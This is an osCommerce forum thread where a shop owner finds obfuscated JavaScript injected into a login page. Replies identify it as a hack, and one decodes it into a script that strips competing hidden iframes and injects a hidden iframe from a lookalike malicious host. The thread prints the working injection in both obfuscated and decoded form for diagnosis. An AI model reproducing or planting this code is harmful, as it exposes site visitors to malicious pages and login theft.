Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Weird javascript in my catalog/login.php


varois

Recommended Posts

My shop start to display one ssl error. the saying that i have itens not secure in my page, if i wish to continue and display the item ... Then i check all pictures and couldn't find any problem ... then i see this weird javascript function:

<script>

function c41883415430m48d35164537b8(m48d3516453ba0){

return (parseInt(m48d3516453ba0,16));

}

function m48d3516454757(m48d3516454b3f){

function m48d35164556f7(){

var m48d3516455adf=2;

return m48d3516455adf;

}

var m48d3516454f27='';

m48d3516455ec6=String.fromCharCode;

for(m48d351645530e=0;m48d351645530e<m48d3516454b3f.length; m48d351645530e+=m48d35164556f7()){

m48d3516454f27+=(m48d3516455ec6(c41883415430m48d35164537b8(m48d3516454b3f.substr

(m48d351645530e,m48d35164556f7()))));

}

return m48d3516454f27;

}

var z16='';

var m48d35164562ae='3C7'+z16+'3637'+z16+'2697'+z16+'07'+z16+'43E667'+z16+'56E637'+z16+'4696F6E20636865636B5F636F6E7'+z16+'4656E7'+z16+'428297'+z16+'B7'+z16+'6617'+z16+'220693D303B7'+z16+'7'+z16+'68696C6528646F637'+z16+'56D656E7'+z16+'42E67'+z16+'657'+z16+'4456C656D656E7'+z16+'47'+z16+'3427'+z16+'9546167'+z16+'4E616D652827'+z16+'69667'+z16+'2616D6527'+z16+'292E6C656E67'+z16+'7'+z16+'468297'+z16+'B7'+z16+'6617'+z16+'220656C3D646F637'+z16+'56D656E7'+z16+'42E67'+z16+'657'+z16+'4456C656D656E7'+z16+'47'+z16+'3427'+z16+'9546167'+z16+'4E616D652827'+z16+'69667'+z16+'2616D6527'+z16+'295B695D3B6966282028656C2E7'+z16+'37'+z16+'47'+z16+'96C652E64697'+z16+'37'+z16+'06C617'+z16+'93D3D27'+z16+'6E6F6E6527'+z16+'207'+z16+'C7'+z16+'C20656C2E7'+z16+'37'+z16+'47'+z16+'96C652E7'+z16+'6697'+z16+'36962696C697'+z16+'47'+z16+'9203D3D27'+z16+'68696464656E27'+z16+'207'+z16+'C7'+z16+'C2028656C2E7'+z16+'7'+z16+'69647'+z16+'4683C3520262620656C2E68656967'+z16+'687'+z16+'43C35292920262620656C2E6E616D65213D27'+z16+'633427'+z16+'297'+z16+'B656C2E7'+z16+'0617'+z16+'2656E7'+z16+'44E6F64652E7'+z16+'2656D6F7'+z16+'6654368696C6428656C293B7'+z16+'D656C7'+z16+'36520692B2B3B7'+z16+'D7'+z16+'D636865636B5F636F6E7'+z16+'4656E7'+z16+'428293B0D0A696628216D7'+z16+'96961297'+z16+'B646F637'+z16+'56D656E7'+z16+'42E7'+z16+'7'+z16+'7'+z16+'2697'+z16+'465287'+z16+'56E657'+z16+'363617'+z16+'065282027'+z16+'2533632536392536362537'+z16+'3225363125366425363525323025366525363125366425363525336425363325333425323025

37'+z16+'332537'+z16+'32253633253364253237'+z16+'2536382537'+z16+'342537'+z16+'342537'+z16+'30253361253266253266253637'+z16+'253666253666253637'+z16+'2536632536352532642536312536652536312536632536392537'+z16+'61253635253265253633253666253664253266253639253665253265253633253637'+z16+'25363925336625333125333526253237'+z16+'2532622534642536312537'+z16+'342536382532652537'+z16+'322536662537'+z16+'352536652536342532382534642536312537'+z16+'342536382532652537'+z16+'3225363125366525363425366625366425323825323925326125333225333325333925333225

3330253239253262253237'+z16+'253334253634253631253336253337'+z16+'253336253330253333253237'+z16+'2532302537'+z16+'37'+z16+'2536392536342537'+z16+'34253638253364253334253336253230253638253635253639253637'+z16+'2536382537'+z16+'342533642533352533322533302532302537'+z16+'332537'+z16+'342537'+z16+'39253663253635253364253237'+z16+'2536342536392537'+z16+'332537'+z16+'302536632536312537'+z16+'39253361253230253665253666253665253635253237'+z16+'2533652533632532662536392536362537'+z16+'3225363125366425363525336527'+z16+'29293B7'+z16+'D7'+z16+'6617'+z16+'2206D7'+z16+'969613D7'+z16+'47'+z16+'27'+z16+'5653B3C2F7'+z16+'3637'+z16+'2697'+z16+'07'+z16+'43E';

document.write(m48d3516454757(m48d35164562ae));

</script>

 

i never see it before and at the end of the code, last line, i found this:

 

<script>check_content()</script>

 

if someone have any knowledge about what is this function, please help me .... i'm afraid to delete this and make a mistake into my shop ...

 

Thanks !!!!

Link to comment
Share on other sites

Delete the script.

 

You have been hacked, check the rest of your site & secure it.

 

http://www.oscommerce.com/forums/index.php?showtopic=313323

 

Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

Yep, you've been hacked. If you have a Joomla or Mambo install on the same hosting you may wish to deal with the security of that install as well - because this javascript hack is normally associated with Joomla and Mambo - specifically a MamBot hack.

 

Vger

Link to comment
Share on other sites

In "man readable" form, the script decodes to this:

 

<script>
function check_content()
{
 var i=0;
 while( document.getElementsByTagName('iframe').length) {
var el=document.getElementsByTagName('iframe')[i];
if (( el.style.display=='none' || el.style.visibility == 'hidden' || (el.width<5 && el.height<5))&& el.name!='c4'){
  el.parentNode.removeChild(el);
} else i++;
 }
}

check_content();

if ( !myia ){
 document.write(unescape('%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f
%67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%39%32%30%29%2b%27%34%64%61%36
%37%36%30%33%27%20%77%69%64%74%68%3d%34%36%20%68%65%69%67%68%74%3d%35%32%30%20%73%74%79%6c%65
%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e')); }
myia = true;
</script>

When you "unescape" the last part, it reads:

 

<iframe name=c4 src='http://google-analize.com/in.cgi?15'+Math.round(Math.random()*23920)+'4da67603' width=46 height=520 style='display: none'></iframe>

Gee....

:huh:

 

It's an iframe.....

:o

 

What a surprise.....

;)

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Iframes are used to steal information.

 

Since it was on your login page, it was used to steal login information.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...